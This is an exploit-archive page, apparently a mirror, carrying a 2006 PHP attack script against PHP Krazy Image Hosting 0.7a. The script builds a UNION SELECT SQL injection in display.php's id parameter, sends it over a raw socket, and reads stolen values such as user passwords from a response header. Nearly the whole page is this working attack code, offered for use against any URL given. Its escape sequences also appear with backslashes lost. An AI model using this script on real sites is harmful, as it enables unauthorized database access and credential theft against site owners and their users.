[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP Krazy Image Hosting 0.7a (display.php) SQL Injection Exploit
# Published : 2006-09-29
# Author : Trex
# Previous Title : VideoDB <= 2.2.1 (pdf.php) Remote File Include Exploit
# Next Title : UBB.threads <= 6.5.1.1 (doeditconfig.php) Code Execution Exploit
<?
/*****************************************************************
|* PHP Krazy Image Host Script (id) Remote SQL Injection Exploit *|
|* Discovered by: Trex *|
|* Solution: http://www.trex-online.net/fixes/display.rar *|
|* Visit: Trex-Online.net / UnderGround.ag *|
*****************************************************************/
error_reporting(0);
echo "# PHP Krazy Image Host Script (id) Remote SQL Injection Exploitn";
echo "# Discovered by: Trexn";
echo "# Solution: http://www.trex-online.net/fixes/display.rarn";
echo "# Visit: Trex-Online.net / UnderGround.agnn";
echo "# Usage: $ php " . $_SERVER['PHP_SELF'] . " [URL] [PATH] [SELECT] [FROM] [WHERE]n";
echo "# Example: $ php " . $_SERVER['PHP_SELF'] . " http://localhost /images/ password users userID=1nn";
if (!$_SERVER['argv'][5])
die();
$url = parse_url($_SERVER['argv'][1] . $_SERVER['argv'][2]);
$sql = "UNION+SELECT+1,1,1,1," . $_SERVER['argv'][3] . ",1,1,1+FROM+" . $_SERVER['argv'][4] . "+WHERE+" . $_SERVER['argv'][5] . "/*";
echo "Connecting to " . $url['host'] . ":80 ... ";
if (!$fsp = fsockopen($url['host'], 80, $errno, $errstr, $timeout))
die("failed.nReason: " . $errno . " - " . $errstr);
echo "done.nn";
$request = "HEAD " . $url['path'] . "display.php?id=0+" . $sql . " HTTP/1.1rn";
$request .= "Host: " . $url['host'] . "rn";
$request .= "Connection: Closernrn";
fputs($fsp, $request);
while (!feof($fsp)) {
$response = fgets($fsp, 4096);
$response = explode(":", $response, 2);
if (count($response) == 2 && preg_match("/Content-Type/", $response[0]))
$result = $response[1];
}
if (preg_match("/text/html/", $result))
echo "Exploit failed!";
else
echo "Result: " . $result;
?>
# www.Syue.com [2006-09-29]